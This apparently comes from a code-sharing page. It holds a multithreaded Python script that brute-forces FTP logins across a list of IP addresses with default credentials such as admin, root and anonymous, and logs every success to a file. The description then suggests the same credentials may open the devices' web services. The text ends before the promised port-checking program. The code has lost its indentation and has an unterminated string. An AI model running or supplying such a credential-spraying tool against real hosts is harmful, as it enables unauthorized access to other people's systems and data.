Code
import ftplib
import threading
import sys
if len(sys.argv) != 3:
print("Usage: python ftp_brute.py ")
sys.exit(1)
ips_file = sys.argv[1]
results_file = sys.argv[2]
usernames = ['admin', 'root', 'user', 'ftp', '', 'anonymous']
passwords = ['ftp', '', 'admin', 'root', 'user', 'anonymous']
def try_login(ip):
try:
with ftplib.FTP(ip) as ftp:
for username in usernames:
for password in passwords:
try:
ftp.login(user=username, passwd=password)
print(f'Successful login to {ip} with credentials: {username}:{password}')
with open(results_file, 'a') as f:
f.write(f'{ip}:{username}:{password}
ftp.quit()
return
except ftplib.all_errors as e:
print(f'Failed login to {ip} with credentials: {username}:{password}')
print(e)
except ftplib.all_errors as e:
print(f'Could not connect to {ip}')
print(e)>
with open(ips_file, 'r') as f:
ips = [line.strip() for line in f]
threads = []
for ip in ips:
thread = threading.Thread(target=try_login, args=(ip,))
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
print('Done.')
Program Description
This Python script attempts to brute force FTP credentials for a list of IP addresses. It uses a predefined list of usernames and passwords to make login attempts.
If you have a file with IP addresses, provide it as a command-line argument when running the script. The script will output successful logins to a results file.
Additional Information
This program uses random usernames and passwords to attempt a login to the FTP server. Once a login has been found, it outputs the details into a text file.
If port 80 is open on the device, it has a chance of using the same login as the FTP, which could potentially lead to data exposure or unauthorized access.
You can use the following program to check for open port 80 on the devices: